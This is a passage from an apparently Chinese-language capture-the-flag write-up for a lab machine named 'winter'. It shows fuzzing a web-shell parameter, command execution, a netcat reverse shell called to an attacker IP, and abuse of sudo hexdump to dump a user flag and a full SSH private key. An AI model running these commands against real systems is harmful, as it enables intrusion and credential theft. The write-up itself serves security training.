(30.30%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 268009 \/ 882244 (30.38%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u5165\u53e3\u70b9\u4e86\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/cmd.winter\/shellcity.php | html2text\n\n[name                ] [********************] [Send]<\/code><\/pre>\n<p>\u5c1d\u8bd5\u778e\u641e\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253551.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253551.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819010742598\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253552.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253552.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819010809699\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u6ca1\u53d1\u73b0\u4e1c\u897f\uff0c\u5c1d\u8bd5\u8fdb\u4e00\u6b65fuzz\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ ffuf -c -u &quot;http:\/\/cmd.winter\/shellcity.php?FUZZ=whoami&quot; -w \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt -fs 1040\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/cmd.winter\/shellcity.php?FUZZ=whoami\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 1040\n________________________________________________\n\nrun                     [Status: 200, Size: 1057, Words: 103, Lines: 58, Duration: 107ms]\n[WARN] Caught keyboard interrupt (Ctrl-C)<\/code><\/pre>\n<p>\u627e\u5230\u53c2\u6570\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s &quot;http:\/\/cmd.winter\/shellcity.php?run=whoami&quot; | html2text\n\n[name                ] [********************] [Send]\nwww-data\nwww-data\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s &quot;http:\/\/cmd.winter\/shellcity.php?run=whoami;id&quot; | html2text\n\n[name                ] [********************] [Send]\nwww-data uid=33(www-data) gid=33(www-data) groups=33(www-data)\nuid=33(www-data) gid=33(www-data) groups=33(www-data)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39 shell \u5e76\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl &quot;http:\/\/cmd.winter\/shellcity.php?run=nc+-e+\/bin\/bash+192.168.10.105+1234&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253553.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253553.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819011547049\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>hexdump\u8bfb\u6587\u4ef6<\/h3>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/hexdump\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/hexdump\/#sudo<\/a><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ sudo -l\nMatching Defaults entries for www-data on winter:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on winter:\n    (catchme) NOPASSWD: \/usr\/bin\/hexdump\n(remote) www-data@winter:\/var\/www\/cmd$ cat \/etc\/passwd | grep \/bin\nroot:x:0:0:root:\/root:\/bin\/bash\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\ncatchme:x:1000:1000:catchme,,,:\/home\/catchme:\/bin\/bash\nmysql:x:107:115:MySQL Server,,,:\/nonexistent:\/bin\/false\n(remote) www-data@winter:\/var\/www\/cmd$ ls -la \/home\/catchme\nls: cannot open directory &#039;\/home\/catchme&#039;: Permission denied\n(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/user.txt&quot;\n00000000  48 4d 56 6c 6f 63 61 6c  68 6f 73 74 0a           |HMVlocalhost.|\n0000000d\n(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.ssh\/id_rsa&quot;\n00000000  2d 2d 2d 2d 2d 42 45 47  49 4e 20 4f 50 45 4e 53  |-----BEGIN OPENS|\n00000010  53 48 20 50 52 49 56 41  54 45 20 4b 45 59 2d 2d  |SH PRIVATE KEY--|\n00000020  2d 2d 2d 0a 62 33 42 6c  62 6e 4e 7a 61 43 31 72  |---.b3BlbnNzaC1r|\n00000030  5a 58 6b 74 64 6a 45 41  41 41 41 41 42 47 35 76  |ZXktdjEAAAAABG5v|\n00000040  62 6d 55 41 41 41 41 45  62 6d 39 75 5a 51 41 41  |bmUAAAAEbm9uZQAA|\n00000050  41 41 41 41 41 41 41 42  41 41 41 42 46 77 41 41  |AAAAAAABAAABFwAA|\n00000060  41 41 64 7a 63 32 67 74  63 6e 0a 4e 68 41 41 41  |AAdzc2gtcn.NhAAA|\n00000070  41 41 77 45 41 41 51 41  41 41 51 45 41 74 53 53  |AAwEAAQAAAQEAtSS|\n00000080  4e 55 6d 4f 32 30 46 4a  6e 49 47 47 74 6d 35 67  |NUmO20FJnIGGtm5g|\n00000090  57 44 33 78 41 31 5a 47  66 67 34 78 6d 56 74 57  |WD3xA1ZGfg4xmVtW|\n000000a0  46 6f 35 75 56 4c 47 38  57 42 74 4b 77 54 4d 62  |Fo5uVLG8WBtKwTMb|\n000000b0  50 0a 65 54 30 52 78 70  32 32 39 61 51 34 62 6b  |P.eT0Rxp229aQ4bk|\n000000c0  70 67 62 32 45 56 4b 51  6a 65 45 6c 58 52 47 39  |pgb2EVKQjeElXRG9|\n000000d0  44 6a 68 52 41 52 6b 43  6d 2f 49 61 46 77 54 38  |DjhRARkCm\/IaFwT8|\n000000e0  54 64 53 33 52 50 68 72  48 35 44 45 33 47 4d 64  |TdS3RPhrH5DE3GMd|\n000000f0  77 44 5a 46 61 4b 61 49  0a 4a 37 51 63 5a 6f 73  |wDZFaKaI.J7QcZos|\n00000100  4d 4c 54 2b 6f 35 65 45  37 31 6b 69 32 5a 42 4a  |MLT+o5eE71ki2ZBJ|\n00000110  48 67 69 43 71 65 69 4a  47 31 64 4d 2b 56 32 57  |HgiCqeiJG1dM+V2W|\n00000120  37 67 58 72 71 36 76 43  41 56 57 67 4a 36 39 4b  |7gXrq6vCAVWgJ69K|\n00000130  51 56 61 78 56 31 71 6d  4e 45 37 31 4b 6b 6a 0a  |QVaxV1qmNE71Kkj.|\n00000140  31 43 6e 6b 42 46 6f 6e  73 66 39 74 51 74 31 32  |1CnkBFonsf9tQt12|\n00000150  47 4a 6d 2f 75 38 62 76  57 48 41 49 34 5a 4f 75  |GJm\/u8bvWHAI4ZOu|\n00000160  6e 63 36 6f 53 56 45 4f  51 57 55 30 64 77 32 6f  |nc6oSVEOQWU0dw2o|\n00000170  50 43 2b 51 44 79 72 30  30 37 54 2f 62 6d 6c 58  |PC+QDyr007T\/bmlX|\n00000180  6d 4e 7a 50 6d 4f 0a 6a  66 44 76 46 78 65 37 39  |mNzPmO.jfDvFxe79|\n00000190  58 73 42 6b 4d 78 67 76  77 6e 51 4a 55 36 71 48  |XsBkMxgvwnQJU6qH|\n000001a0  30 38 66 4c 38 2b 32 46  46 7a 79 49 68 66 71 2f  |08fL8+2FFzyIhfq\/|\n000001b0  44 66 66 47 5a 58 74 64  33 47 43 39 6f 6a 73 55  |DffGZXtd3GC9ojsU|\n000001c0  50 70 2b 6c 59 65 4e 44  70 48 48 35 6e 0a 64 69  |Pp+lYeNDpHH5n.di|\n000001d0  39 6d 53 44 69 7a 2b 51  41 41 41 38 6a 4d 41 35  |9mSDiz+QAAA8jMA5|\n000001e0  36 36 7a 41 4f 65 75 67  41 41 41 41 64 7a 63 32  |66zAOeugAAAAdzc2|\n000001f0  67 74 63 6e 4e 68 41 41  41 42 41 51 43 31 4a 49  |gtcnNhAAABAQC1JI|\n00000200  31 53 59 37 62 51 55 6d  63 67 59 61 32 62 6d 42  |1SY7bQUmcgYa2bmB|\n00000210  59 50 66 45 0a 44 56 6b  5a 2b 44 6a 47 5a 57 31  |YPfE.DVkZ+DjGZW1|\n00000220  59 57 6a 6d 35 55 73 62  78 59 47 30 72 42 4d 78  |YWjm5UsbxYG0rBMx|\n00000230  73 39 35 50 52 48 47 6e  62 62 31 70 44 68 75 53  |s95PRHGnbb1pDhuS|\n00000240  6d 42 76 59 52 55 70 43  4e 34 53 56 64 45 62 30  |mBvYRUpCN4SVdEb0|\n00000250  4f 4f 46 45 42 47 51 4b  62 38 68 0a 6f 58 42 50  |OOFEBGQKb8h.oXBP|\n00000260  78 4e 31 4c 64 45 2b 47  73 66 6b 4d 54 63 59 78  |xN1LdE+GsfkMTcYx|\n00000270  33 41 4e 6b 56 6f 70 6f  67 6e 74 42 78 6d 69 77  |3ANkVopogntBxmiw|\n00000280  77 74 50 36 6a 6c 34 54  76 57 53 4c 5a 6b 45 6b  |wtP6jl4TvWSLZkEk|\n00000290  65 43 49 4b 70 36 49 6b  62 56 30 7a 35 58 5a 62  |eCIKp6IkbV0z5XZb|\n000002a0  75 42 0a 65 75 72 71 38  49 42 56 61 41 6e 72 30  |uB.eurq8IBVaAnr0|\n000002b0  70 42 56 72 46 58 57 71  59 30 54 76 55 71 53 50  |pBVrFXWqY0TvUqSP|\n000002c0  55 4b 65 51 45 57 69 65  78 2f 32 31 43 33 58 59  |UKeQEWiex\/21C3XY|\n000002d0  59 6d 62 2b 37 78 75 39  59 63 41 6a 68 6b 36 36  |Ymb+7xu9YcAjhk66|\n000002e0  64 7a 71 68 4a 55 51 35  42 0a 5a 54 52 33 44 61  |dzqhJUQ5B.ZTR3Da|\n000002f0  67 38 4c 35 41 50 4b 76  54 54 74 50 39 75 61 56  |g8L5APKvTTtP9uaV|\n00000300  65 59 33 4d 2b 59 36 4e  38 4f 38 58 46 37 76 31  |eY3M+Y6N8O8XF7v1|\n00000310  65 77 47 51 7a 47 43 2f  43 64 41 6c 54 71 6f 66  |ewGQzGC\/CdAlTqof|\n00000320  54 78 38 76 7a 37 59 55  58 50 49 69 46 2b 72 38  |Tx8vz7YUXPIiF+r8|\n00000330  0a 4e 39 38 5a 6c 65 31  33 63 59 4c 32 69 4f 78  |.N98Zle13cYL2iOx|\n00000340  51 2b 6e 36 56 68 34 30  4f 6b 63 66 6d 64 32 4c  |Q+n6Vh40Okcfmd2L|\n00000350  32 5a 49 4f 4c 50 35 41  41 41 41 41 77 45 41 41  |2ZIOLP5AAAAAwEAA|\n00000360  51 41 41 41 51 41 57 41  6e 48 31 62 38 34 33 73  |QAAAQAWAnH1b843s|\n00000370  37 74 36 45 4d 52 43 0a  59 70 46 54 6f 6c 70 53  |7t6EMRC.YpFTolpS|\n00000380  57 4e 5a 54 36 6f 78 49  77 72 72 78 4c 53 64 4c  |WNZT6oxIwrrxLSdL|\n00000390  39 64 64 73 54 73 39 44  46 4f 6b 43 70 79 76 77  |9ddsTs9DFOkCpyvw|\n000003a0  77 52 73 49 37 38 49 33  6a 47 76 35 50 49 65 51  |wRsI78I3jGv5PIeQ|\n000003b0  71 39 59 6e 7a 69 75 52  51 4b 6c 55 63 71 0a 5a  |q9YnziuRQKlUcq.Z|\n000003c0  66 71 4f 4c 6a 57 44 56  49 53 2f 68 44 67 63 64  |fqOLjWDVIS\/hDgcd|\n000003d0  6a 36 31 34 43 59 37 54  51 50 42 5a 68 61 36 35  |j614CY7TQPBZha65|\n000003e0  33 6b 6c 73 64 6d 39 6a  2b 6d 54 32 65 64 51 76  |3klsdm9j+mT2edQv|\n000003f0  7a 52 42 44 69 61 7a 4e  42 46 69 4f 30 76 62 65  |zRBDiazNBFiO0vbe|\n00000400  53 79 34 4d 47 0a 6d 6a  76 75 57 77 6a 74 6e 61  |Sy4MG.mjvuWwjtna|\n00000410  59 41 79 45 6a 65 4f 38  7a 68 39 4e 51 58 41 47  |YAyEjeO8zh9NQXAG|\n00000420  72 4c 69 59 78 73 79 42  68 45 44 63 74 56 39 51  |rLiYxsyBhEDctV9Q|\n00000430  4e 33 45 2f 32 78 67 6e  30 47 37 32 31 72 62 62  |N3E\/2xgn0G721rbb|\n00000440  73 58 36 71 6d 7a 2b 52  6c 74 57 33 0a 44 46 4c  |sX6qmz+RltW3.DFL|\n00000450  43 46 54 6a 51 69 4c 4a  65 2b 62 34 79 6d 48 70  |CFTjQiLJe+b4ymHp|\n00000460  35 4c 74 6f 43 38 72 6e  62 70 4a 41 71 69 75 41  |5LtoC8rnbpJAqiuA|\n00000470  4f 6e 4a 77 77 72 6f 38  38 4c 53 75 71 47 2b 6f  |OnJwwro88LSuqG+o|\n00000480  2b 78 79 47 76 4d 6f 45  4b 6a 4d 35 70 65 51 73  |+xyGvMoEKjM5peQs|\n00000490  2f 67 35 0a 36 38 55 6a  65 77 58 48 35 36 68 39  |\/g5.68UjewXH56h9|\n000004a0  44 47 76 54 69 2b 7a 55  6d 50 30 66 51 68 36 52  |DGvTi+zUmP0fQh6R|\n000004b0  32 4c 53 33 73 6c 6e 64  79 68 59 33 33 5a 65 39  |2LS3slndyhY33Ze9|\n000004c0  41 41 41 41 67 51 44 67  78 6b 4c 57 61 56 36 56  |AAAAgQDgxkLWaV6V|\n000004d0  61 52 31 39 76 4a 53 4b  75 45 0a 62 7a 4f 61 66  |aR19vJSKuE.bzOaf|\n000004e0  7a 31 56 58 49 41 65 62  65 59 30 72 7a 46 36 35  |z1VXIAebeY0rzF65|\n000004f0  49 56 75 5a 50 65 75 38  69 34 65 72 35 45 2b 44  |IVuZPeu8i4er5E+D|\n00000500  46 32 43 43 6f 46 48 46  61 30 39 67 6c 57 6a 36  |F2CCoFHFa09glWj6|\n00000510  53 2f 30 71 70 68 48 69  71 46 30 51 68 6b 54 4f  |S\/0qphHiqF0QhkTO|\n00000520  56 0a 33 62 6d 7a 6d 48  4d 50 62 37 61 7a 2f 30  |V.3bmzmHMPb7az\/0|\n00000530  2b 6c 6c 2f 39 35 71 70  78 52 5a 79 33 68 33 58  |+ll\/95qpxRZy3h3X|\n00000540  52 61 43 38 50 77 4d 50  63 79 6e 44 46 4d 49 67  |RaC8PwMPcynDFMIg|\n00000550  63 70 2f 55 4f 66 70 74  2f 42 41 30 53 35 2b 6d  |cp\/UOfpt\/BA0S5+m|\n00000560  34 73 75 55 37 37 65 77  0a 4d 57 42 4d 46 6e 31  |4suU77ew.MWBMFn1|\n00000570  50 63 78 6e 77 41 41 41  49 45 41 34 5a 6a 68 45  |PcxnwAAAIEA4ZjhE|\n00000580  4e 39 72 51 32 46 57 6f  44 51 49 58 75 6c 32 34  |N9rQ2FWoDQIXul24|\n00000590  45 61 64 5a 30 4c 42 44  50 72 6b 41 36 6c 43 2f  |EadZ0LBDPrkA6lC\/|\n000005a0  36 6c 76 79 46 42 33 48  73 49 52 64 66 48 6f 0a  |6lvyFB3HsIRdfHo.|\n000005b0  62 5a 71 71 6d 78 2b 70  31 53 63 71 4d 4f 43 37  |bZqqmx+p1ScqMOC7|\n000005c0  36 69 70 41 74 50 6d 6d  35 2f 50 6b 73 43 58 31  |6ipAtPmm5\/PksCX1|\n000005d0  43 71 42 31 37 37 55 35  54 32 44 42 67 63 35 59  |CqB177U5T2DBgc5Y|\n000005e0  51 48 37 6e 4b 57 69 6d  64 6b 52 61 34 2b 46 39  |QH7nKWimdkRa4+F9|\n000005f0  6d 37 75 6d 39 78 0a 58  33 77 47 36 6d 6c 50 69  |m7um9x.X3wG6mlPi|\n00000600  6f 35 35 47 4e 54 4c 45  68 37 47 75 39 50 42 4c  |o55GNTLEh7Gu9PBL|\n00000610  38 4a 35 59 5a 45 74 57  70 71 35 78 54 54 39 65  |8J5YZEtWpq5xTT9e|\n00000620  79 56 70 44 38 46 6d 63  41 41 41 43 42 41 4d 32  |yVpD8FmcAAACBAM2|\n00000630  4e 2f 68 41 6d 4c 76 41  30 2b 67 69 37 0a 51 4f  |N\/hAmLvA0+gi7.QO|\n00000640  68 4a 36 2f 77 2b 43 77  74 50 76 35 4b 67 66 65  |hJ6\/w+CwtPv5Kgfe|\n00000650  78 6c 6e 50 50 32 45 38  33 37 38 61 4a 75 35 67  |xlnPP2E8378aJu5g|\n00000660  2b 4f 5a 4c 54 31 4f 59  58 4d 43 68 69 73 75 48  |+OZLT1OYXMChisuH|\n00000670  53 46 43 6b 42 6f 45 52  53 72 45 58 51 68 49 74  |SFCkBoERSrEXQhIt|\n00000680  2f 45 41 55 0a 61 64 41  55 4d 31 49 61 6e 6b 58  |\/EAU.adAUM1IankX|\n00000690  50 79 79 6e 78 47 56 49  57 6d 73 58 54 36 39 34  |PyynxGVIWmsXT694|\n000006a0  4b 68 6c 4d 49 6d 44 65  53 31 4e 43 74 68 72 6f  |KhlMImDeS1NCthro|\n000006b0  32 6c 51 43 30 46 4b 59  57 53 38 4e 67 74 45 39  |2lQC0FKYWS8NgtE9|\n000006c0  36 53 62 4f 32 57 69 61  52 7a 48 0a 42 62 6b 68  |6SbO2WiaRzH.Bbkh|\n000006d0  72 6c 36 52 46 59 4b 64  34 4b 61 66 41 41 41 41  |rl6RFYKd4KafAAAA|\n000006e0  44 6d 4e 68 64 47 4e 6f  62 57 56 41 64 32 6c 75  |DmNhdGNobWVAd2lu|\n000006f0  64 47 56 79 41 51 49 44  42 41 3d 3d 0a 2d 2d 2d  |dGVyAQIDBA==.---|\n00000700  2d 2d 45 4e 44 20 4f 50  45 4e 53 53 48 20 50 52  |--END OPENSSH PR|\n00000710  49 56 41 54 45 20 4b 45  59 2d 2d 2d 2d 2d 0a     |IVATE KEY-----.|\n0000071f<\/code><\/pre>\n<p>\u7136\u540e\u7529\u5230 cyberchef\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253554.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253554.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240819012758608\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528\u6b63\u5219\u8868\u8fbe\u5f0f\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@winter:\/var\/www\/cmd$ sudo -u catchme \/usr\/bin\/hexdump -C &quot;\/home\/catchme\/.ssh\/id_rsa&quot; | awk -F &#039;[|]&#039; &#039;{print $2}&#039; | tr -d &#039;\\n.&#039;   \n-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcnNhAAAAAwEAAQAAAQEAtSSNUmO20FJnIGGtm5gWD3xA1ZGfg4xmVtWFo5uVLG8WBtKwTMbPeT0Rxp229aQ4bkpgb2EVKQjeElXRG9DjhRARkCm\/IaFwT8TdS3RPhrH5DE3GMdwDZFaKaIJ7QcZosMLT+o5eE71ki2ZBJHgiCqeiJG1dM+V2W7gXrq6vCAVWgJ69KQVaxV1qmNE71Kkj1CnkBFonsf9tQt12GJm\/u8bvWHAI4ZOunc6oSVEOQWU0dw2oPC+QDyr007T\/bmlXmNzPmOjfDvFxe79XsBkMxgvwnQJU6qH08fL8+2FFzyIhfq\/DffGZXtd3GC9ojsUPp+lYeNDpHH5ndi9mSDiz+QAAA8jMA566zAOeugAAAAdzc2gtcnNhAAABAQC1JI1SY7bQUmcgYa2bmBYPfEDVkZ+DjGZW1YWjm5UsbxYG0rBMxs95PRHGnbb1pDhuSmBvYRUpCN4SVdEb0OOFEBGQKb8hoXBPxN1LdE+GsfkMTcYx3ANkVopogntBxmiwwtP6jl4TvWSLZkEkeCIKp6IkbV0z5XZbuBeurq8IBVaAnr0pBVrFXWqY0TvUqSPUKeQEWiex\/21C3XYYmb+7xu9YcAjhk66dzqhJUQ5BZTR3Dag8L5APKvTTtP9uaVeY3M+Y6N8O8XF7v1ewGQzGC\/CdAlTqofTx8vz7YUXPIiF+r8N98Zle13cYL2iOxQ+n6Vh40Okcfmd2L2ZIOLP5AAAAAwEAAQAAAQAWAnH1b843s7t6EMRCYpFTolpSWNZT6oxIwrrxLSdL9ddsTs9DFOkCpyvwwRsI78I3jGv5PIeQq9YnziuRQKlUcqZfqOLjWDVIS\/hDgcdj614CY7TQPBZha653klsdm9j+mT2edQvzRBDiazNBFiO0vbeSy4MGmjvuWwjtnaYAyEjeO8zh9NQXAGrLiYxsyBhEDctV9QN3E\/2xgn0G721rbbsX6qmz+RltW3DFLCFTjQiLJe+b4ymHp5LtoC8rnbpJAqiuAOnJwwro88LSuqG+o+xyGvMoEKjM5peQs\/g568UjewXH56h9DGvTi+zUmP0fQh6R2LS3slndyhY33Ze9AAAAgQDgxkLWaV6VaR19vJSKuEbzOafz1VXIAebeY0rzF65IVuZPeu8i4er5E+DF2CCoFHFa09glWj6S\/0qphHiqF0QhkTOV3bmzmHMPb7az\/0+ll\/95qpxRZy3h3XRaC8PwMPcynDFMIgcp\/UOfpt\/BA0S5+m4suU77ewMWBMFn1PcxnwAAAIEA4ZjhEN9rQ2FWoDQIXul24EadZ0LBDPrkA6lC\/6lvyFB3HsIRdfHobZqqmx+p1ScqMOC76ipAtPmm5\/PksCX1CqB177U5T2DBgc5YQH7nKWimdkRa4+F9m7um9xX3wG6mlPio55GNTLEh7Gu9PBL8J5YZEtWpq5xTT9eyVpD8FmcAAACBAM2N\/hAmLvA0+gi7QOhJ6\/w+CwtPv5KgfexlnPP2E8378aJu5g+OZLT1OYXMChisuHSFCkBoERSrEXQhIt\/EAUadAUM1IankXPyynxGVIWmsXT694KhlMImDeS1NCthro2lQC0FKYWS8NgtE96SbO2WiaRzHBbkhrl6RFYKd4KafAAAADmNhdGNobWVAd2ludGVyAQIDBA==-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u5c06\u5b9a\u4f4d\u6807\u8bb0\u5f52\u4f4d\u5373\u53ef\u4f7f\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcnNhAAAAAwEAAQAAAQEAtSSNUmO20FJnIGGtm5gWD3xA1ZGfg4xmVtWFo5uVLG8WBtKwTMbPeT0Rxp229aQ4bkpgb2EVKQjeElXRG9DjhRARkCm\/IaFwT8TdS3RPhrH5DE3GMdwDZFaKaIJ7QcZosMLT+o5eE71ki2ZBJHgiCqeiJG1dM+V2W7gXrq6vCAVWgJ69KQVaxV1qmNE71Kkj1CnkBFonsf9tQt12GJm\/u8bvWHAI4ZOunc6oSVEOQWU0dw2oPC+QDyr007T\/bmlXmNzPmOjfDvFxe79XsBkMxgvwnQJU6qH08fL8+2FFzyIhfq\/DffGZXtd3GC9ojsUPp+lYeNDpHH5ndi9mSDiz+QAAA8jMA566zAOeugAAAAdzc2gtcnNhAAABAQC1JI1SY7bQUmcgYa2bmBYPfEDVkZ+DjGZW1YWjm5UsbxYG0rBMxs95PRHGnbb1pDhuSmBvYRUpCN4SVdEb0OOFEBGQKb8hoXBPxN1LdE+GsfkMTcYx3ANkVopogntBxmiwwtP6jl4TvWSLZkEkeCIKp6IkbV0z5XZbuBeurq8IBVaAnr0pBVrFXWqY0TvUqSPUKeQEWiex\/21C3XYYmb+7xu9YcAjhk66dzqhJUQ5BZTR3Dag8L5APKvTTtP9uaVeY3M+Y6N8O8XF7v1ewGQzGC\/CdAlTqofTx8vz7YUXPIiF+r8N98Zle13cYL2iOxQ+n6Vh40Okcfmd2L2ZIOLP5AAAAAwEAAQAAAQAWAnH1b843s7t6EMRCYpFTolpSWNZT6oxIwrrxLSdL9ddsTs9DFOkCpyvwwRsI78I3jGv5PIeQq9YnziuRQKlUcqZfqOLjWDVIS\/hDgcdj614CY7TQPBZha653klsdm9j+mT2edQvzRBDiazNBFiO0vbeSy4MGmjvuWwjtnaYAyEjeO8zh9NQXAGrLiYxsyBhEDctV9QN3E\/2xgn0G721rbbsX6qmz+RltW3DFLCFTjQiLJe+b4ymHp5LtoC8rnbpJAqiuAOnJwwro88LSuqG+o+xyGvMoEKjM5peQs\/g568UjewXH56h9DGvTi+zUmP0fQh6R2LS3slndyhY33Ze9AAAAgQDgxkLWaV6VaR19vJSKuEbzOafz1VXIAebeY0rzF65IVuZPeu8i4er5E+DF2CCoFHFa09glWj6S\/0qphHiqF0QhkTOV3bmzmHMPb7az\/0+ll\/95qpxRZy3h3XRaC8PwMPcynDFMIgcp\/UOfpt\/BA0S5+m4suU77ewMWBMFn1PcxnwAAAIEA4ZjhEN9rQ2FWoDQIXul24EadZ0LBDPrk